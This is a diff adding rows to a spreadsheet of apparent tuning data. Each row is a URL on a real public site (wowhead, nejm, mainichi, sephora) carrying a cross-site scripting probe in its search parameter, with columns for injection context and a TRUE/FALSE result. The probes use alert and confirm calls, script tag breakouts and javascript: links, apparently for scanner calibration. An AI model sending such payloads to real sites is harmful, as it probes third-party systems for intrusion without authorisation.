--- a/TuningData/file.xlsx
+++ b/TuningData/file.xlsx
@@ -322,7 +322,7 @@
     <outlinePr summaryBelow="1" summaryRight="1"/>
     <pageSetUpPr/>
   </sheetPr>
-  <dimension ref="A1:D2"/>
+  <dimension ref="A1:D9"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0">
       <selection activeCell="A1" sqref="A1"/>
@@ -374,7 +374,155 @@
           <t>TRUE</t>
         </is>
       </c>
-      <c r="D2" t="inlineStr"/>
+    </row>
+    <row r="3">
+      <c r="A3" t="inlineStr">
+        <is>
+          <t>https://www.wowhead.com/search?q=' onmouseover='alert`1`</t>
+        </is>
+      </c>
+      <c r="B3" t="inlineStr">
+        <is>
+          <t>ATTR</t>
+        </is>
+      </c>
+      <c r="C3" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D3" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="4">
+      <c r="A4" t="inlineStr">
+        <is>
+          <t>https://www.nejm.org/search?pageType=search&amp;q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;&amp;asug=</t>
+        </is>
+      </c>
+      <c r="B4" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C4" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D4" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="5">
+      <c r="A5" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q='; confirm`1`; '&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B5" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C5" t="inlineStr">
+        <is>
+          <t>TRUE</t>
+        </is>
+      </c>
+    </row>
+    <row r="6">
+      <c r="A6" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E&amp;s=date</t>
+        </is>
+      </c>
+      <c r="B6" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C6" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D6" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="7">
+      <c r="A7" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s='; confirm`1`; '</t>
+        </is>
+      </c>
+      <c r="B7" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C7" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D7" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="8">
+      <c r="A8" t="inlineStr">
+        <is>
+          <t>https://www.mainichi.jp/search/?&amp;q=&amp;s=%3Ca+href%3D%22jaVaScripT%3AAleRt%281%29%22%3Eclick_XYZ%3C%2Fa%3E</t>
+        </is>
+      </c>
+      <c r="B8" t="inlineStr">
+        <is>
+          <t>URL</t>
+        </is>
+      </c>
+      <c r="C8" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D8" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
+    </row>
+    <row r="9">
+      <c r="A9" t="inlineStr">
+        <is>
+          <t>https://www.sephora.fr/recherche?q=&lt;/script&gt;&lt;script&gt;alert`1`&lt;/script&gt;</t>
+        </is>
+      </c>
+      <c r="B9" t="inlineStr">
+        <is>
+          <t>SCRIPT</t>
+        </is>
+      </c>
+      <c r="C9" t="inlineStr">
+        <is>
+          <t>FALSE</t>
+        </is>
+      </c>
+      <c r="D9" t="inlineStr">
+        <is>
+          <t>None</t>
+        </is>
+      </c>
     </row>
   </sheetData>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
